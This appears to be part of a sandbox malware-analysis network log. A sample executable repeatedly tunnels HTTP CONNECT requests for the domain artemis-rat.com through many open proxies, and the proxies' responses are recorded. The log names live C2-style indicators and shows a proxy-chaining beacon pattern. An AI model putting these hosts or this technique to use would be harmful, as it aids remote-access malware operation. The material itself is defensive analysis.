                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-/


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1110192.168.2.55294318.228.198.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254632950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.581552029 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1111192.168.2.55292836.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254934072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1112192.168.2.55302472.167.222.113395743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.257531881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1113192.168.2.552995147.124.212.31242303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.258810997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806344986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490557909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.695132017 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.083539009 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.405575991 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.811322927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.509557009 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1114 | 192.168.2.5 | 52950 | 178.128.113.118 | 23128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.261372089 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.099472046 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1115 | 192.168.2.5 | 52957 | 185.49.30.5 | 8081 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.272599936 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1116 | 192.168.2.5 | 52948 | 148.66.130.53 | 56350 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.275378942 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.107947111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.180085897 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.266851902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.468164921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.717565060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1117 | 192.168.2.5 | 52941 | 114.255.132.60 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.276257038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.104173899 CET | 1286 | IN | HTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Server: squid/3.5.27
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3938
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {marg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1118 | 192.168.2.5 | 52924 | 114.55.84.12 | 30001 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.283380985 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.634098053 CET | 767 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1119192.168.2.553083172.67.127.188803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.284259081 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.438546896 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1120192.168.2.55301712.176.231.147803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.359186888 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.565798044 CET | 169 | IN | HTTP/1.0 400 Bad request
                                                                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1121192.168.2.55099351.75.125.208409983876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.359188080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1122192.168.2.55304266.207.184.7354323876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.359504938 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.575198889 CET | 308 | IN | HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1123192.168.2.55302240.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.367286921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1124192.168.2.551169121.204.179.7077773876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.367700100 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.975516081 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1125192.168.2.551048167.71.210.23431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.373447895 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.505565882 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.608275890 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.717577934 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1126192.168.2.552888103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.374037981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1127192.168.2.552961111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.377927065 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1128192.168.2.55307850.199.46.20321003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.378493071 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1129192.168.2.55300020.111.54.1681233876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.385641098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.677930117 CET | 319 | IN | HTTP/1.1 403 Forbidden
Server: squid
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from cdn-fintech.info
X-Cache-Lookup: NONE from cdn-fintech.info:8123
Connection: keep-alive
Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
Data Ascii: ERR_ACCESS_DENIED


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1130192.168.2.553131104.25.108.120803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.386029959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.540323973 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1131192.168.2.553129104.16.105.142803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.386641979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.541336060 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1132192.168.2.55298558.234.116.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.387958050 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1133192.168.2.55298843.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.390767097 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1134192.168.2.552984195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.399040937 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1135192.168.2.553178104.18.161.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.400348902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.554366112 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1136192.168.2.55305282.113.157.122312803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.400348902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.127326012 CET | 39 | IN | HTTP/1.0 200 Connection established


